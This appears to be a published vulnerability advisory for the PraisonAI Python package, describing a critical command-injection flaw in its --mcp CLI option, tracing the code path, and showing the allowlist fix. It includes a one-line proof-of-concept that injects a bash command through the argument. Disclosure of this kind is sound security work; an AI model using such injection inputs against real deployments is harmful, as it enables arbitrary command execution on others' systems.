PT-2026-53548 · Pypi · Praisonai
Published
2026-06-29
·
Updated
2026-06-29
CVSS v3.1
9.8
Critical
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Summary
The
--mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user.Details
cli/features/mcp.py:61 (source) -> praisonaiagents/mcp/mcp.py:345 (hop) -> mcp/client/stdio/ init .py:253 (sink)python
# source
parts = shlex.split(command)
# hop
cmd, args, env = self.parse mcp command(command, env vars)
self.server params = StdioServerParameters(command=cmd, args=arguments)
# sink
process = await anyio.open process([command, *args])
Fixed in commit
47bff65413beaa3c21bf633c1fae4e684348368c (v4.5.69) by introducing a command allowlist:python
ALLOWED COMMANDS = {"npx", "uvx", "node", "python"}
if cmd not in ALLOWED COMMANDS:
raise ValueError(f"Disallowed command: {cmd}")PoC
python
# tested on: praisonai==4.5.48
# install: pip install praisonai==4.5.48
# run: praisonai --mcp "bash -c 'id > /tmp/pwned'"
# verify: cat /tmp/pwned
# expected output: uid=1000(...) gid=1000(...) groups=1000(...)Impact
Any deployment where the
--mcp argument is influenced by untrusted input is exposed to full OS command execution as the process user. No authentication is required.Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Praisonai